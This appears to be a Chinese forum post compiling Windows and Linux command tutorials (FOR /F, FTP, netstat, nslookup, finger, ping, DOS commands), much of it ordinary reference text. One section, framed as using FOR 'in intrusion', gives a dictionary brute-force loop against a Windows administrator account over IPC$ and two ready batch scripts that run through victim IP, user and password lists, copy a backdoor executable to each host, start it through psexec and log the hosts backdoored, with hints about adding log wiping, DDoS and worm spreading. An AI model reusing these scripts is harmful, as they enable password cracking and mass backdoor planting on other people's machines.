最后，您可以用 FOR /F 命令來分析命令的輸出。方法是，將 ? ? ? ? ? ? 括號之間的 filenameset 變成一個反括字符串。該字符串會 ? ? ? ? ? ? 被當作命令行，傳遞到一個子 CMD.EXE，其輸出會被抓進 ? ? ? ? ? ? 內存，并被當作文件分析。因此，以下例子: ? ? ? ? ? ? FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i ? ? ? ? ? ? 會枚舉當前環境中的環境變量名稱。 ? ? ? ? ? ? 另外，FOR 變量參照的替換已被增強。您現在可以使用下列 ? ? ? ? ? ? 選項語法: ? ? ? ? ? ? ~I - 刪除任何引號(")，擴充 %I ? ? ? ? ? ? %~fI - 將 %I 擴充到一個完全合格的路徑名 ? ? ? ? ? ? %~dI - 僅將 %I 擴充到一個驅動器號 ? ? ? ? ? ? %~pI - 僅將 %I 擴充到一個路徑 ? ? ? ? ? ? %~nI - 僅將 %I 擴充到一個文件名 ? ? ? ? ? ? %~xI - 僅將 %I 擴充到一個文件擴展名 ? ? ? ? ? ? %~sI - 擴充的路徑只含有短名 ? ? ? ? ? ? %~aI - 將 %I 擴充到文件的文件屬性 ? ? ? ? ? ? %~tI - 將 %I 擴充到文件的日期/時間 ? ? ? ? ? ? %~zI - 將 %I 擴充到文件的大小 ? ? ? ? ? ? %~$PATH:I - 查找列在路徑環境變量的目錄，并將 %I 擴充 ? ? ? ? ? ? 到找到的第一個完全合格的名稱。如果環境變量 ? ? ? ? ? ? 未被定義，或者沒有找到文件，此組合鍵會擴充 ? ? ? ? ? ? 空字符串 ? ? ? ? ? ? 可以組合修飾符來得到多重結果: ? ? ? ? ? ? %~dpI - 僅將 %I 擴充到一個驅動器號和路徑 ? ? ? ? ? ? %~nxI - 僅將 %I 擴充到一個文件名和擴展名 ? ? ? ? ? ? %~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名 ? ? ? ? ? ? %~dp$PATH:i - 查找列在路徑環境變量的目錄，并將 %I 擴充 ? ? ? ? ? ? 到找到的第一個驅動器號和路徑。 ? ? ? ? ? ? %~ftzaI - 將 %I 擴充到類似輸出線路的 DIR ? ? ? ? ? ? 在以上例子中，%I 和 PATH 可用其他有效數值代替。%~ 語法 ? ? ? ? ? ? 用一個有效的 FOR 變量名終止。選取類似 %I 的大寫變量名 ? ? ? ? ? ? 比較易讀，而且避免與不分大小寫的組合鍵混淆。 ? ? ? ? ? ? 以上是MS的官方幫助，下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。 ? ? ? ? ? ? sample2： ? ? ? ? ? ? 利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。 ? ? ? ? ? ? 我們用net use \\ip\ipc$ "password" ? ? ? ? ? ? /u:"administrator"來嘗試這和目標主機進行連接，當成功時記下密碼。 ? ? ? ? ? ? 最主要的命令是一條：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" ? ? ? ? ? ? /u:"administrator" ? ? ? ? ? ? 用i%來表示admin的密碼，在dict.txt中這個取i%的值用net use ? ? ? ? ? ? 命令來連接。然后將程序運行結果傳遞給find命令－－ ? ? ? ? ? ? for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" ? ? ? ? ? ? /u:"administrator"│find ":命令成功完成">>D:\ok.txt ，這樣就ko了。 ? ? ? ? ? ? sample3： ? ? ? ? ? ? 你有沒有過手里有大量肉雞等著你去種后門＋木馬呢？，當數量特別多的時候，原本很開心的一件事都會變得很郁悶：）。文章開頭就談到使用批處理文件，可以簡化日常或重復性任務。那么如何實現呢？呵呵，看下去你就會明白了。 ? ? ? ? ? ? 主要命令也只有一條：（在批處理文件中使用 FOR 命令時，指定變量使用 %%variable） ? ? ? ? ? ? @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start ? ? ? ? ? ? call cultivate.bat %%i %%j %%k ? ? ? ? ? ? tokens的用法請參見上面的sample1，在這里它表示按順序將victim.txt中的內容傳遞給cultivate.bat中的參數%i ? ? ? ? ? ? %j %k。 ? ? ? ? ? ? 而cultivate.bat無非就是用net ? ? ? ? ? ? use命令來建立IPC$連接，并copy木馬＋后門到victim并用返回碼（If errorlever ? ? ? ? ? ? =）來篩選成功種植后門的主機并echo出來，或者echo到文件。 ? ? ? ? ? ? delims= ? ? ? ? ? ? 表示vivtim.txt中的內容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內容是什么樣的了。應該根據%%i ? ? ? ? ? ? %%j %%k表示的對象來，一般就是 ip password username。 ? ? ? ? ? ? --------------- cut here then save as a batchfile(I call it ? ? ? ? ? ? main.bat ) --------------------------- ? ? ? ? ? ? @echo off ? ? ? ? ? ? @if "%1"=="" goto usage ? ? ? ? ? ? @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start ? ? ? ? ? ? call IPChack.bat %%i %%j %%k ? ? ? ? ? ? @goto end ? ? ? ? ? ? :usage ? ? ? ? ? ? @echo run this batch in dos modle.or just double-click it. ? ? ? ? ? ? :end ? ? ? ? ? ? --------------- cut here then save as a batchfile(I call it ? ? ? ? ? ? main.bat ) --------------------------- ? ? ? ? ? ? ------------------- cut here then save as a batchfile(I call ? ? ? ? ? ? it door.bat) ----------------------------- ? ? ? ? ? ? @net use \\%1\ipc$ %3 /u:"%2" ? ? ? ? ? ? @if errorlevel 1 goto failed ? ? ? ? ? ? @echo Trying to establish the IPC$ connection …………OK ? ? ? ? ? ? @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 ? ? ? ? ? ? echo IP %1 USER %2 PWD %3 >>ko.txt ? ? ? ? ? ? @p***ec \\%1 c:\winnt\system32\windrv32.exe ? ? ? ? ? ? @p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 ? ? ? ? ? ? Backdoored >>ko.txt ? ? ? ? ? ? :failed ? ? ? ? ? ? @echo Sorry can not connected to the victim. ? ? ? ? ? ? ----------------- cut here then save as a batchfile(I call it ? ? ? ? ? ? door.bat) -------------------------------- ? ? ? ? ? ? 這只是一個自動種植后門批處理的雛形，兩個批處理和后門程序（Windrv32.exe）,PSexec.exe需放在統一目錄下.批處理內容 ? ? ? ? ? ? 尚可擴展,例如:加入清除日志+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究 ? ? ? ? ? ? FTP命令 ? ? ? ? ? ? FTP命令是Internet用戶使用最頻繁的命令之一，熟悉并靈活應用FTP的內部命令，可以大大方便使用者，并收到事半功倍之效。 ? ? ? ? ? ? 如果你想學習使用進行后臺FTP下載，那么就必須學習FTP指令。 ? ? ? ? ? ? FTP的命令行格式為： ftp -v -d -i -n -g [主機名] ， ? ? ? ? ? ? 其中 -v 顯示遠程服務器的所有響應信息； ? ? ? ? ? ? -n 限制ftp的自動登錄，即不使用；.n etrc文件； ? ? ? ? ? ? -d 使用調試方式； ? ? ? ? ? ? -g 取消全局文件名。 ? ? ? ? ? ? FTP使用的內部命令如下(中括號表示可選項): ? ? ? ? ? ? 1.![cmd[args>：在本地機中執行交互shell，exit回到ftp環境，如：!ls*.zip ? ? ? ? ? ? 2.$ macro-ame[args]： 執行宏定義macro-name。 ? ? ? ? ? ? 3.account[password]： 提供登錄遠程系統成功后訪問系統資源所需的補充口令。 ? ? ? ? ? ? 4.append ? ? ? ? ? ? local-file[remote-file]：將本地文件追加到遠程系統主機，若未指定遠程系統文件名，則使用本地文件名。 ? ? ? ? ? ? 5.ascii：使用ascii類型傳輸方式。 ? ? ? ? ? ? 6.bell：每個命令執行完畢后計算機響鈴一次。 ? ? ? ? ? ? 7.bin：使用二進制文件傳輸方式。 ? ? ? ? ? ? 8.bye：退出ftp會話過程。 ? ? ? ? ? ? 9.case：在使用mget時，將遠程主機文件名中的大寫轉為小寫字母。 ? ? ? ? ? ? 10.cd remote-dir：進入遠程主機目錄。 ? ? ? ? ? ? 11.cdup：進入遠程主機目錄的父目錄。 ? ? ? ? ? ? 12.chmod mode file-name：將遠程主機文件file-name的存取方式設置為mode，如：chmod ? ? ? ? ? ? 777 a.out。 ? ? ? ? ? ? 13.close：中斷與遠程服務器的ftp會話(與open對應)。 ? ? ? ? ? ? 14.cr：使用asscii方式傳輸文件時，將回車換行轉換為回行。 ? ? ? ? ? ? 15.delete remote-file：刪除遠程主機文件。 ? ? ? ? ? ? 16.debug[debug-value]：設置調試方式， 顯示發送至遠程主機的每條命令，如：deb up ? ? ? ? ? ? 3，若設為0，表示取消debug。 ? ? ? ? ? ? 17.dir[remote-dir][local-file]：顯示遠程主機目錄，并將結果存入本地文件 ? ? ? ? ? ? 18.disconnection：同close。 ? ? ? ? ? ? 19.form format：將文件傳輸方式設置為format，缺省為file方式。 ? ? ? ? ? ? 20.get remote-file[local-file]： ? ? ? ? ? ? 將遠程主機的文件remote-file傳至本地硬盤的local-file。 ? ? ? ? ? ? 21.glob：設置mdelete，mget，mput的文件名擴展，缺省時不擴展文件名，同命令行的-g參數。 ? ? ? ? ? ? 22.hash：每傳輸1024字節，顯示一個hash符號(#)。 ? ? ? ? ? ? 23.help[cmd]：顯示ftp內部命令cmd的幫助信息，如：help get。 ? ? ? ? ? ? 24.idle[seconds]：將遠程服務器的休眠計時器設為[seconds]秒。 ? ? ? ? ? ? 25.image：設置二進制傳輸方式(同binary)。 ? ? ? ? ? ? 26.lcd[dir]：將本地工作目錄切換至dir。 ? ? ? ? ? ? 27.ls[remote-dir][local-file]：顯示遠程目錄remote-dir， ? ? ? ? ? ? 并存入本地文件local-file。 ? ? ? ? ? ? 28.macdef macro-name：定義一個宏，遇到macdef下的空行時，宏定義結束。 ? ? ? ? ? ? 29.mdelete[remote-file]：刪除遠程主機文件。 ? ? ? ? ? ? 30.mdir remote-files local-file：與dir類似，但可指定多個遠程文件，如 ：mdir ? ? ? ? ? ? *.o.*.zipoutfile 。 ? ? ? ? ? ? 31.mget remote-files：傳輸多個遠程文件。 ? ? ? ? ? ? 32.mkdir dir-name：在遠程主機中建一目錄。 ? ? ? ? ? ? 33.mls remote-file local-file：同nlist，但可指定多個文件名。 ? ? ? ? ? ? 34.mode[modename]：將文件傳輸方式設置為modename， 缺省為stream方式。 ? ? ? ? ? ? 35.modtime file-name：顯示遠程主機文件的最后修改時間。 ? ? ? ? ? ? 36.mput local-file：將多個文件傳輸至遠程主機。 ? ? ? ? ? ? 37.newer file-name： 如果遠程機中file-name的修改時間比本地硬盤同名文件的時間更近，則重傳該文件。 ? ? ? ? ? ? 38.nlist[remote-dir][local-file]：顯示遠程主機目錄的文件清單，并存入本地硬盤的local-file。 ? ? ? ? ? ? 39.nmap[inpattern outpattern]：設置文件名映射機制， 使得文件傳輸時，文件中的某些字符相互轉換， ? ? ? ? ? ? 如：nmap $1.$2.$3[$1，$2].[$2，$3]，則傳輸文件a1.a2.a3時，文件名變為a1，a2。 ? ? ? ? ? ? 該命令特別適用于遠程主機為非UNIX機的情況。 ? ? ? ? ? ? 40.ntrans[inchars[outchars>：設置文件名字符的翻譯機制，如ntrans1R，則文件名LLL將變為RRR。 ? ? ? ? ? ? 41.open host[port]：建立指定ftp服務器連接，可指定連接端口。 ? ? ? ? ? ? 42.passive：進入被動傳輸方式。 ? ? ? ? ? ? 43.prompt：設置多個文件傳輸時的交互提示。 ? ? ? ? ? ? 44.proxy ftp-cmd：在次要控制連接中，執行一條ftp命令， ? ? ? ? ? ? 該命令允許連接兩個ftp服務器，以在兩個服務器間傳輸文件。第一條ftp命令必須為open，以首先建立兩個服務器間的連接。 ? ? ? ? ? ? 45.put local-file[remote-file]：將本地文件local-file傳送至遠程主機。 ? ? ? ? ? ? 46.pwd：顯示遠程主機的當前工作目錄。 ? ? ? ? ? ? 47.quit：同bye，退出ftp會話。 ? ? ? ? ? ? 48.quote arg1，arg2...：將參數逐字發至遠程ftp服務器，如：quote syst. ? ? ? ? ? ? 49.recv remote-file[local-file]：同get。 ? ? ? ? ? ? 50.reget remote-file[local-file]：類似于get， ? ? ? ? ? ? 但若local-file存在，則從上次傳輸中斷處續傳。 ? ? ? ? ? ? 51.rhelp[cmd-name]：請求獲得遠程主機的幫助。 ? ? ? ? ? ? 52.rstatus[file-name]：若未指定文件名，則顯示遠程主機的狀態， 否則顯示文件狀態。 ? ? ? ? ? ? 53.rename[from][to]：更改遠程主機文件名。 ? ? ? ? ? ? 54.reset：清除回答隊列。 ? ? ? ? ? ? 55.restart marker：從指定的標志marker處，重新開始get或put，如：restart 130。 ? ? ? ? ? ? 56.rmdir dir-name：刪除遠程主機目錄。 ? ? ? ? ? ? 57.runique：設置文件名只一性存儲，若文件存在，則在原文件后加后綴.1， .2等。 ? ? ? ? ? ? 58.send local-file[remote-file]：同put。 ? ? ? ? ? ? 59.sendport：設置PORT命令的使用。 ? ? ? ? ? ? 60.site arg1，arg2...：將參數作為SITE命令逐字發送至遠程ftp主機。 ? ? ? ? ? ? 61.size file-name：顯示遠程主機文件大小，如：site idle 7200。 ? ? ? ? ? ? 62.status：顯示當前ftp狀態。 ? ? ? ? ? ? 63.struct[struct-name]：將文件傳輸結構設置為struct-name， 缺省時使用stream結構。 ? ? ? ? ? ? 64.sunique：將遠程主機文件名存儲設置為只一(與runique對應)。 ? ? ? ? ? ? 65.system：顯示遠程主機的操作系統類型。 ? ? ? ? ? ? 66.tenex：將文件傳輸類型設置為TENEX機的所需的類型。 ? ? ? ? ? ? 67.tick：設置傳輸時的字節計數器。 ? ? ? ? ? ? 68.trace：設置包跟蹤。 ? ? ? ? ? ? 69.type[type-name]：設置文件傳輸類型為type-name，缺省為ascii，如:type ? ? ? ? ? ? binary，設置二進制傳輸方式。 ? ? ? ? ? ? 70.umask[newmask]：將遠程服務器的缺省umask設置為newmask，如：umask 3 ? ? ? ? ? ? 71.user ? ? ? ? ? ? user-name[password][account]：向遠程主機表明自己的身份，需要口令時，必須輸入口令，如：user ? ? ? ? ? ? anonymous my@email。 ? ? ? ? ? ? 72.verbose：同命令行的-v參數，即設置詳盡報告方式，ftp 服務器的所有響 應都將顯示給用戶，缺省為on. ? ? ? ? ? ? 73.?[cmd]：同help. ? ? ? ? ? ? 那么如何應用這些命令提高效率呢？下面我舉一個例子，如何利用fttp進行 ? ? ? ? ? ? 后臺下載，假設你的ISP給你提供了shell并且可以用nohup，你想由fttp.downlo ? ? ? ? ? ? ad.com/pub/internet/下載一個30M的程序aaa.zip具體步驟如下： ? ? ? ? ? ? 1.用notepad做一個文件如aaa1內容如下 ? ? ? ? ? ? 　　 open ftp.dwonload.com user an onymous zyz@cenpok.net ? ? ? ? ? ? cd /pub/internet/ i get aaa.zip close bye ? ? ? ? ? ? 2.撥號登錄到你的ISP上。 ? ? ? ? ? ? 用telnet 或netterm登錄到shell，一般都在你的home子目錄里bbs～/ ? ? ? ? ? ? 3.用fttp上傳aaa1到ISP服務器你的子目錄。 　　　　 ? ? ? ? ? ? 4. 執行nohup fttp －invd aaa2＆ 這樣這個進程就被放在ISP服務器的后臺進行了， ? ? ? ? ? ? 如果你想知道情況如何，可以more aaa2就可以知道情況如何了。這時你可以斷線了或干點別的， ? ? ? ? ? ? 估計時間到了(time約=30M/(33.6K/9)s)撥號上去，more aaa2如果顯示成功下載aaa.zip, ? ? ? ? ? ? 就表示aaa.zip已經被下載到ISP的服務器上了，你再由ISP的服務器拉回來就相當與點對點了, ? ? ? ? ? ? 記得下載完成后del掉你的文件(aaa.zip)，免得浪費ISP資源，它會關掉shell的。 ? ? ? ? ? ? netstat命令 ? ? ? ? ? ? netstat命令的功能是顯示網絡連接、路由表和網絡接口信息，可以讓用戶得知目前都有哪些網絡連接正在運作。 ? ? ? ? ? ? 該命令的一般格式為： ? ? ? ? ? ? netstat [選項] (如 netstat -a) ? ? ? ? ? ? 命令中各選項的含義如下： ? ? ? ? ? ? -a 顯示所有socket，包括正在監聽的。 ? ? ? ? ? ? -c 每隔1秒就重新顯示一遍，直到用戶中斷它。 ? ? ? ? ? ? -i 顯示所有網絡接口的信息，格式同“ipconfig -e”。 ? ? ? ? ? ? -n 以網絡IP地址代替名稱，顯示出網絡連接情形。 ? ? ? ? ? ? -r 顯示核心路由表，格式同“route -e”。 ? ? ? ? ? ? -t 顯示TCP協議的連接情況。 ? ? ? ? ? ? -u 顯示UDP協議的連接情況。 ? ? ? ? ? ? -v 顯示正在進行的工作。 ? ? ? ? ? ? [例]在本地機上使用netstat命令。 ? ? ? ? ? ? $ netstat ? ? ? ? ? ? Active Internet connections （w/o servers） ? ? ? ? ? ? Proto Recv-Q Send-Q Local Address Foreign Address State ? ? ? ? ? ? Active UNIX domain sockets （w/o servers） ? ? ? ? ? ? Proto RefCnt Flags Type State I-Node Path ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 270 @00000008 ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 150 @00000002 ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 104 @00000001 ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 222 @00000004 ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 171 @00000003 ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 271 /dev/log ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 225 /dev/log ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 223 /dev/log ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 203 /dev/log ? ? ? ? ? ? unix 1 [ ] STREAM CONNECTED 105 /dev/log ? ? ? ? ? ? …… ? ? ? ? ? ? netstat命令的列標題 ? ? ? ? ? ? Name 接口的名字 ? ? ? ? ? ? Mtu 接口的最大傳輸單位 ? ? ? ? ? ? Net/Dest 接口所在的網絡 ? ? ? ? ? ? Address 接口的IP地址 ? ? ? ? ? ? Ipkts 接收到的數據包數目 ? ? ? ? ? ? Ierrs 接收到時已損壞的數據包數目 ? ? ? ? ? ? Opkts 發送的數據包數目 ? ? ? ? ? ? Oeers 發送時已損壞的數據包數目 ? ? ? ? ? ? Collisions 由這個接口所記錄的網絡沖突數目 ? ? ? ? ? ? nslookup命令 ? ? ? ? ? ? nslookup命令的功能是查詢一臺機器的IP地址和其對應的域名。它通常需要一臺域名服務器來提供域名服務。如果用戶已經設置好域名服務器，就可以用這個命令查看不同主機的IP地址對應的域名。 ? ? ? ? ? ? 該命令的一般格式為： ? ? ? ? ? ? nslookup [IP地址/域名] ? ? ? ? ? ? [例]在本地機上使用nslookup命令。 ? ? ? ? ? ? $ nslookup ? ? ? ? ? ? Default Server: name.tlc.com.cn ? ? ? ? ? ? Address: 192.168.1.99 ? ? ? ? ? ? > ? ? ? ? ? ? 在符號“>”后面輸入要查詢的IP地址或域名并回車即可。如果要退出該命令，輸入exit并回車即可。 ? ? ? ? ? ? finger命令 ? ? ? ? ? ? finger命令的功能是查詢用戶的信息，通常會顯示系統中某個用戶的用戶名、主目錄、停滯時間、登錄時間、登錄shell等信息。如果要查詢遠程機上的用戶信息，需要在用戶名后面接“@主機名”，采用[用戶名@主機名]的格式，不過要查詢的網絡主機需要運行finger守護進程。 ? ? ? ? ? ? 該命令的一般格式為： ? ? ? ? ? ? finger [選項] [使用者] [用戶@主機] ? ? ? ? ? ? 命令中各選項的含義如下： ? ? ? ? ? ? -s 顯示用戶的注冊名、實際姓名、終端名稱、寫狀態、停滯時間、登錄時間等信息。 -l ? ? ? ? ? ? 除了用-s選項顯示的信息外，還顯示用戶主目錄、登錄shell、郵件狀態等信息，以及用戶主目錄下的.plan、.project和.forward文件的內容。 ? ? ? ? ? ? -p 除了不顯示.plan文件和.project文件以外，與-l選項相同。 ? ? ? ? ? ? 　 ? ? ? ? ? ? [例]在本地機上使用finger命令。 ? ? ? ? ? ? $ finger xxq ? ? ? ? ? ? Login: xxq Name: ? ? ? ? ? ? Directory: /home/xxq Shell: /bin/bash ? ? ? ? ? ? Last login Thu Jan 1 21:43 （CST） on tty1 ? ? ? ? ? ? No mail. ? ? ? ? ? ? No Plan. ? ? ? ? ? ? 　 ? ? ? ? ? ? $ finger ? ? ? ? ? ? Login Name Tty Idle Login Time Office Office Phone ? ? ? ? ? ? root root *1 28 Nov 25 09:17 ? ? ? ? ? ? …… ? ? ? ? ? ? TurboLinux系統提供了大量命令和許多實用工具軟件，本書由于篇幅的關系，主要介紹了TurboLinux的一些常用命令和實用軟件。讀者可以使用系統提供的聯機幫助手冊獲取更多的信息。 ? ? ? ? ? ? TurboLinux系統的聯機手冊中有大量的可用信息，根據其內容分成若干節。在Linux聯機幫助手冊上，幾乎每個命令都有說明。因此，當用戶對于Linux上的一個命令不會用或是不太了解時，就請使用聯機幫助命令。 ?
?
[樓 主] | Posted: 2006-05-23 08:02

?

?

本章主要介紹幾個常用的聯機幫助命令。包括： ? ? ? ? ? ? man 查詢每個命令的使用方法 ? ? ? ? ? ? help 查詢Shell命令 ? ? ? ? ? ? whereis 查詢某個命令的位置 ? ? ? ? ? ? locate 查詢某個文件的位置 ? ? ? ? ? ? man命令 ? ? ? ? ? ? 這個命令應該是每個Linux系統上都有的。它格式化并顯示在線的手冊頁。通常使用者只要在命令man后，輸入想要獲取的命令的名稱（例如 ? ? ? ? ? ? ls），man就會列出一份完整的說明，其內容包括命令語法、各選項的意義以及相關命令等。 ? ? ? ? ? ? 該命令的一般形式為： ? ? ? ? ? ? man [選項] 命令名稱 ? ? ? ? ? ? 命令中各選項的含義分別為： ? ? ? ? ? ? -M 路徑 ? ? ? ? ? ? 指定搜索man手冊頁的路徑，通常這個路徑由環境變量MANPATH預設，如果在命令行上指定另外的路徑，則覆蓋MANPATH的設定。 ? ? ? ? ? ? -P 命令 指定所使用的分頁程序，缺省使用/usr/bin/less–is，在環境變量MANPAGER中預設。 ? ? ? ? ? ? -S 章節 由于一個命令名稱可能會有很多類別，至于類別，列出如下： ? ? ? ? ? ? 　 ? ? ? ? ? ? 章節 說明 ? ? ? ? ? ? 1 一般使用者的命令 ? ? ? ? ? ? 2 系統調用的命令 ? ? ? ? ? ? 3 C語言函數庫的命令 ? ? ? ? ? ? 4 有關驅動程序和系統設備的解釋 ? ? ? ? ? ? 5 配置文件的解釋 ? ? ? ? ? ? 6 游戲程序的命令 ? ? ? ? ? ? 7 其他的軟件或是程序的命令 ? ? ? ? ? ? 有關系統維護的命令 ? ? ? ? ? ? 　 ? ? ? ? ? ? -a 顯示所有的手冊頁，而不是只顯示第一個。 ? ? ? ? ? ? -d 這個選項主要在檢查時使用，如果用戶加入了一個新的文件，就可以用這個選項檢查是否出錯，這個選項并不會列出文件內容。 ? ? ? ? ? ? -f 只顯示出命令的功能而不顯示其中詳細的說明文件。 ? ? ? ? ? ? -p string 設定運行的預先處理程序的順序，共有下列幾項： ? ? ? ? ? ? e eqn t tbl ? ? ? ? ? ? g grap r refer ? ? ? ? ? ? p pic v vgrind ? ? ? ? ? ? -w 不顯示手冊頁，只顯示將被格式化和顯示的文件所在位置。 ? ? ? ? ? ? 例如：查看cd命令的使用方法。 ? ? ? ? ? ? $ man cd ? ? ? ? ? ? cd（n） Tcl Built-In Commands cd（n） ? ? ? ? ? ? _________________________________________________________________ ? ? ? ? ? ? NAME ? ? ? ? ? ? cd - Change working directory ? ? ? ? ? ? SYNOPSIS ? ? ? ? ? ? cd ?dirName? ? ? ? ? ? ? _________________________________________________________________ ? ? ? ? ? ? DEs criptION ? ? ? ? ? ? Change the current working directory to dirName, or to the ? ? ? ? ? ? home directory （as specified in the HOME environment vari- ? ? ? ? ? ? able） if dirName is not given. Returns an empty string. ? ? ? ? ? ? KEYWORDS ? ? ? ? ? ? working directory ? ? ? ? ? ? Tcl 1 ? ? ? ? ? ? （END） ? ? ? ? ? ? 可以按q鍵退出man命令。 ? ? ? ? ? ? help命令 ? ? ? ? ? ? help命令用于查看所有Shell命令。用戶可以通過該命令尋求Shell命令的用法，只需在所查找的命令后輸入help命令，就可以看到所查命令的內容了。 ? ? ? ? ? ? 　 ? ? ? ? ? ? 例如：查看od命令的使用方法。 ? ? ? ? ? ? $ od --help ? ? ? ? ? ? 　whereis命令 ? ? ? ? ? ? 這個程序的主要功能是尋找一個命令所在的位置。例如，我們最常用的ls命令，它是在/bin這個目錄下的。如果希望知道某個命令存在哪一個目錄下，可以用whereis命令來查詢。 ? ? ? ? ? ? 該命令的一般形式為： ? ? ? ? ? ? whereis [選項] 命令名 ? ? ? ? ? ? 說明：一般直接使用不加選項的whereis命令，但用戶也可根據特殊需要選用它的一些選項。 ? ? ? ? ? ? 該命令中各選項的含義分別為： ? ? ? ? ? ? b 只查找二進制文件 ? ? ? ? ? ? m 查找主要文件 ? ? ? ? ? ? s 查找來源 ? ? ? ? ? ? u 查找不常用的記錄文件 ? ? ? ? ? ? 例如：查找ls命令在什么目錄下。 ? ? ? ? ? ? $ whereis ls ? ? ? ? ? ? ls:/bin/ls/usr/man/man1/ls.1 ? ? ? ? ? ? PING命令 ? ? ? ? ? ? 講述它的簡單用法： ? ? ? ? ? ? ping這個命令是在windows98/me的dos和winnt/2000的命令行下的 ? ? ? ? ? ? 一個命令。它給另一個系統發送一些列的數據包，該系統本身又發回 ? ? ? ? ? ? 一個響應，ping命令用于查看網絡上的主機是否在工作，它向該主機發送ICMP ? ? ? ? ? ? ECHO_REQUEST包。有時我們想從網絡上的某臺主機上下載文件，可是又不知道那臺主機是否開著，就需要使用ping命令查看。它返回的結果如下 ? ? ? ? ? ? Pinging TBid.mshome.net [127.0.0.1] with 32 bytes of data: ? ? ? ? ? ? Reply from 127.0.0.1: bytes=32 time<10ms TTL=64 ? ? ? ? ? ? Reply from 127.0.0.1: bytes=32 time<10ms TTL=64 ? ? ? ? ? ? Reply from 127.0.0.1: bytes=32 time<10ms TTL=64 ? ? ? ? ? ? Reply from 127.0.0.1: bytes=32 time<10ms TTL=64 ? ? ? ? ? ? Ping statistics for 127.0.0.1: ? ? ? ? ? ? Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ? ? ? ? ? ? Approximate round trip times in milli-seconds: ? ? ? ? ? ? Minimum = 0ms, Maximum = 0ms, Average = 0ms ? ? ? ? ? ? 返回信息表示是否能夠連通該主機，宿主機發送一個返回數據包需要的 ? ? ? ? ? ? 時間。 ? ? ? ? ? ? 在提示符后輸入c:windows>ping /? ? ? ? ? ? ? 可以返回如下的幫助文件。 ? ? ? ? ? ? Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v ? ? ? ? ? ? TOS] ? ? ? ? ? ? [-r count] [-s count] <-j host-list] │ [-k host-list> ? ? ? ? ? ? [-w timeout] destination-list ? ? ? ? ? ? ping [選項] 主機名/IP地址 ? ? ? ? ? ? -a 將目標的機器標識轉換為ip地址 ? ? ? ? ? ? -t 若使用者不人為中斷會不斷的ping下去 ? ? ? ? ? ? -c count 要求ping命令連續發送數據包，直到發出并接收到count個請求 ? ? ? ? ? ? -d 為使用的套接字打開調試狀態 ? ? ? ? ? ? -f ? ? ? ? ? ? 是一種快速方式ping。使得ping輸出數據包的速度和數據包從遠程主機返回一樣快，或者更快，達到每秒100次。在這種方式下，每個請求用一個句點表示。對于每一個響應打印一個空格鍵。 ? ? ? ? ? ? -i seconds 在兩次數據包發送之間間隔一定的秒數。不能同-f一起使用。 ? ? ? ? ? ? -n ? ? ? ? ? ? 只使用數字方式。在一般情況下ping會試圖把IP地址轉換成主機名。這個選項要求ping打印IP地址而不去查找用符號表示的名字。如果由于某種原因無法使用本地DNS服務器這個選項就很重要了。 ? ? ? ? ? ? -p pattern 擁護可以通過這個選項標識16 ? ? ? ? ? ? pad字節，把這些字節加入數據包中。當在網絡中診斷與數據有關的錯誤時這個選項就非常有用。 ? ? ? ? ? ? -q 使ping只在開始和結束時打印一些概要信息。 ? ? ? ? ? ? -R 把ICMP ? ? ? ? ? ? RECORD-ROUTE選項加入到ECHO_REQUEST數據包中，要求在數據包中記錄路由，這樣當數據返回時ping就可以把路由信息打印出來。每個數據包只能記錄9個路由節點。許多主機忽略或者放棄這個選項。 ? ? ? ? ? ? -r 使ping命令旁路掉用于發送數據包的正常路由表。 ? ? ? ? ? ? -s packetsize ? ? ? ? ? ? 使用戶能夠標識出要發送數據的字節數。缺省是56個字符，再加上8個字節的ICMP數據頭，共64個ICMP數據字節。 ? ? ? ? ? ? -v ? ? ? ? ? ? 使ping處于verbose方式。它要ping命令除了打印ECHO-RESPONSE數據包之外，還打印其它所有返回的ICMP數據包。 ? ? ? ? ? ? 這個命令還有一個作用就是把域名轉為ip地址，比如 ? ? ? ? ? ? pingwww.sohu.com ? ? ? ? ? ? 然后返回的一個ip地址就是www.sohu.com的ip地址。 ? ? ? ? ? ? 也不是說ping不到的ip地址，就不存在，其實也有一種可能就是對方的機器有防火墻。 ? ? ? ? ? ? DOS命令 ? ? ? ? ? ? 一）MD——建立子目錄 ? ? ? ? ? ? 1．功能：創建新的子目錄 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：MD[盤符：][路徑名]〈子目錄名〉 ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）“盤符”：指定要建立子目錄的磁盤驅動器字母，若省略，則為當前驅動器； ? ? ? ? ? ? （2）“路徑名”：要建立的子目錄的上級目錄名，若缺省則建在當前目錄下。 ? ? ? ? ? ? 例：（1）在C盤的根目錄下創建名為FOX的子目錄；（2）在FOX子目錄下再創建USER子目錄。 ? ? ? ? ? ? C：、＞MD FOX （在當前驅動器C盤下創建子目錄FOX） ? ? ? ? ? ? C：、＞MD FOX 、USER （在FOX 子目錄下再創建USER子目錄） ? ? ? ? ? ? （二）CD——改變當前目錄 ? ? ? ? ? ? 1．功能：顯示當前目錄 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：CD[盤符：][路徑名][子目錄名] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? 